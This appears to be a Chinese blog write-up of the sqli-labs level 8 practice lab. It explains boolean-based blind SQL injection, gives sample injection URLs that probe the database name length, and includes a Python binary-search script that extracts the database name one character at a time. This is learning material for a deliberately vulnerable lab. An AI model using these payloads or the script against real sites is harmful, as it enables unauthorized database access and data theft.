sqli-labs学习记录8

less-8

打开靶场。

输入id=1得到了和前面一样的回显。

通过尝试前面的闭合方式,是'))的闭合方式。

我们输入id=1')).

发现没有报错回显。

这关发现回显就2种方式,一种是有字符回显,一种是啥都没,那根据这样的回显方式我们可以使用布尔盲注的方法。

我们可以通过不断改变范围来查看页面的回显,这样我们最后就可以确定一个值,这样循环操作得到最后的结果。

比如我们可以用length函数和二分法来确定数据库的长度。

?id=1' and (select length(database())>1) and 1=1 --+

正常回显。

我们尝试输入

?id=1' and (select length(database()>8)) and 1=1 --+

显示无回显,下面我们输入

?id=1' and (select length(database()>7)) and 1=1 --+

回显正常,再和前面的作比较,我们>8是无回显,>7有回显,说明就剩8是正确的了。通过这种方法我们就确定了数据库名的长度,也可以通过可以再利用ascii函数+substr函数来修改字符串的范围,判断数据库的各个字符的ASCII的值,来转换为最后的数据库名称。

那么根据这种方法,我们可以写一个py脚本来帮助我们解决这些循环的操作。

python 复制代码
import requests

url = "..."


def inject_database(url):
    name = ''

    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

可以看到通过上面的脚本就可以轻松的通过布尔盲注的方式来解决。

查询数据库里的表与字段也可以通过写脚本的方式来执行。这里就不做阐述了。

相关推荐
程序新视界7 分钟前
MySQL中的数据去重,该用DISTINCT还是GROUP BY?
数据库·后端·mysql
Dyanic8 分钟前
FreeFusion:基于交叉重构学习的红外与可见光图像融合
学习·重构
谱写秋天12 分钟前
软考-系统架构设计师 关系数据库详细讲解
数据库·系统架构·软考架构师
檀越剑指大厂16 分钟前
平替MongoDB:金仓多模数据库助力电子证照国产化实践
数据库·mongodb
cpsvps1 小时前
环境变量管理于美国服务器多环境部署的实施标准
运维·服务器·数据库
IvorySQL1 小时前
【生态再升级】IvorySQL 4.5 与银河麒麟高级服务器操作系统V11完成适配认证!
运维·服务器·数据库·postgresql·ivorysql
CYX_cheng2 小时前
sqlsugar sqlite
数据库·sqlite
茉莉玫瑰花茶2 小时前
Redis - Bitmap 类型
数据库·redis·缓存
IvorySQL2 小时前
聚焦六大功能:PostgreSQL 18 新特性深度解析
数据库·postgresql·开源
leo_yu_yty2 小时前
Mysql DBA学习笔记(MVCC)
学习·mysql·dba